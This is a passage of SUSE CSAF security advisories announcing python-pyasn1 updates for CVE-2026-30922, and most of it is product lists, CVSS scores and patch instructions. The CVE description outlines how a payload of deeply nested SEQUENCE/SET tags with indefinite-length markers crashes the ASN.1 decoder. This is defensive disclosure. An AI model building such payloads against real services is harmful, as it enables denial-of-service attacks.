"SUSE Linux Enterprise Micro 5.4:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.5:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server 15 SP6-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-30922",
"url": "https://www.suse.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "SUSE Bug 1259803 for CVE-2026-30922",
"url": "https://bugzilla.suse.com/1259803"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.2:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.3:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.4:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.5:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server 15 SP6-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.2:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.3:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.4:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.5:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server 15 SP6-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-31T11:55:53Z",
"details": "important"
}
],
"title": "CVE-2026-30922"
}
]
}
SUSE-SU-2026:1075-1
Vulnerability from csaf_suse - Published: 2026-03-26 12:41 - Updated: 2026-03-26 12:41Summary
Security update for python-pyasn1
Severity
Important
Notes
Title of the patch: Security update for python-pyasn1
Description of the patch: This update for python-pyasn1 fixes the following issues:
- CVE-2026-30922: Denial of Service via Unbounded Recursion (bsc#1259803).
Patchnames: SUSE-2026-1075,SUSE-SLE-Module-Public-Cloud-15-SP4-2026-1075,SUSE-SLE-Module-Python3-15-SP7-2026-1075,SUSE-SLE-Product-HPC-15-SP4-ESPOS-2026-1075,SUSE-SLE-Product-HPC-15-SP4-LTSS-2026-1075,SUSE-SLE-Product-HPC-15-SP5-ESPOS-2026-1075,SUSE-SLE-Product-HPC-15-SP5-LTSS-2026-1075,SUSE-SLE-Product-SLES-15-SP4-LTSS-2026-1075,SUSE-SLE-Product-SLES-15-SP5-LTSS-2026-1075,SUSE-SLE-Product-SLES-15-SP6-LTSS-2026-1075,SUSE-SLE-Product-SLES_SAP-15-SP4-2026-1075,SUSE-SLE-Product-SLES_SAP-15-SP5-2026-1075,SUSE-SLE-Product-SLES_SAP-15-SP6-2026-1075,openSUSE-SLE-15.6-2026-1075
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
| URL | Category | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for python-pyasn1",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for python-pyasn1 fixes the following issues:\n\n- CVE-2026-30922: Denial of Service via Unbounded Recursion (bsc#1259803).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1075,SUSE-SLE-Module-Public-Cloud-15-SP4-2026-1075,SUSE-SLE-Module-Python3-15-SP7-2026-1075,SUSE-SLE-Product-HPC-15-SP4-ESPOS-2026-1075,SUSE-SLE-Product-HPC-15-SP4-LTSS-2026-1075,SUSE-SLE-Product-HPC-15-SP5-ESPOS-2026-1075,SUSE-SLE-Product-HPC-15-SP5-LTSS-2026-1075,SUSE-SLE-Product-SLES-15-SP4-LTSS-2026-1075,SUSE-SLE-Product-SLES-15-SP5-LTSS-2026-1075,SUSE-SLE-Product-SLES-15-SP6-LTSS-2026-1075,SUSE-SLE-Product-SLES_SAP-15-SP4-2026-1075,SUSE-SLE-Product-SLES_SAP-15-SP5-2026-1075,SUSE-SLE-Product-SLES_SAP-15-SP6-2026-1075,openSUSE-SLE-15.6-2026-1075",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1075-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1075-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261075-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1075-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024958.html"
},
{
"category": "self",
"summary": "SUSE Bug 1259803",
"url": "https://bugzilla.suse.com/1259803"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-30922 page",
"url": "https://www.suse.com/security/cve/CVE-2026-30922/"
}
],
"title": "Security update for python-pyasn1",
"tracking": {
"current_release_date": "2026-03-26T12:41:27Z",
"generator": {
"date": "2026-03-26T12:41:27Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1075-1",
"initial_release_date": "2026-03-26T12:41:27Z",
"revision_history": [
{
"date": "2026-03-26T12:41:27Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"product": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"product_id": "python311-pyasn1-0.5.0-150400.12.13.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Public Cloud 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Module for Public Cloud 15 SP4",
"product_id": "SUSE Linux Enterprise Module for Public Cloud 15 SP4",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-public-cloud:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Python 3 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Python 3 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-python3:15:sp7"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP6-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP6-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP6-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp6"
}
}
},
{
"category": "product_name",
"name": "openSUSE Leap 15.6",
"product": {
"name": "openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:leap:15.6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise Module for Public Cloud 15 SP4",
"product_id": "SUSE Linux Enterprise Module for Public Cloud 15 SP4:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Public Cloud 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP7:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise Server 15 SP6-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP6-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP6-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP6:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-30922",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-30922"
}
],
"notes": [
{
"category": "general",
"text": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP4:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP7:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server 15 SP6-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"openSUSE Leap 15.6:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-30922",
"url": "https://www.suse.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "SUSE Bug 1259803 for CVE-2026-30922",
"url": "https://bugzilla.suse.com/1259803"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP4:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP7:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server 15 SP6-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"openSUSE Leap 15.6:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP4:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP7:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server 15 SP6-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"openSUSE Leap 15.6:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T12:41:27Z",
"details": "important"
}
],
"title": "CVE-2026-30922"
}
]
}
SUSE-SU-2026:1076-1
Vulnerability from csaf_suse - Published: 2026-03-26 12:42 - Updated: 2026-03-26 12:42Summary
Security update for python-pyasn1
Severity
Important
Notes
Title of the patch: Security update for python-pyasn1
Description of the patch: This update for python-pyasn1 fixes the following issues:
- CVE-2026-30922: Denial of Service via Unbounded Recursion (bsc#1259803).
Patchnames: SUSE-2026-1076,SUSE-SLE-SERVER-12-SP5-LTSS-2026-1076,SUSE-SLE-SERVER-12-SP5-LTSS-EXTENDED-SECURITY-2026-1076
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
| URL | Category | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for python-pyasn1",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for python-pyasn1 fixes the following issues:\n\n- CVE-2026-30922: Denial of Service via Unbounded Recursion (bsc#1259803).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1076,SUSE-SLE-SERVER-12-SP5-LTSS-2026-1076,SUSE-SLE-SERVER-12-SP5-LTSS-EXTENDED-SECURITY-2026-1076",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1076-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1076-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261076-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1076-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024957.html"
},
{
"category": "self",
"summary": "SUSE Bug 1259803",
"url": "https://bugzilla.suse.com/1259803"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-30922 page",
"url": "https://www.suse.com/security/cve/CVE-2026-30922/"
}
],
"title": "Security update for python-pyasn1",
"tracking": {
"current_release_date": "2026-03-26T12:42:05Z",
"generator": {
"date": "2026-03-26T12:42:05Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1076-1",
"initial_release_date": "2026-03-26T12:42:05Z",
"revision_history": [
{
"date": "2026-03-26T12:42:05Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
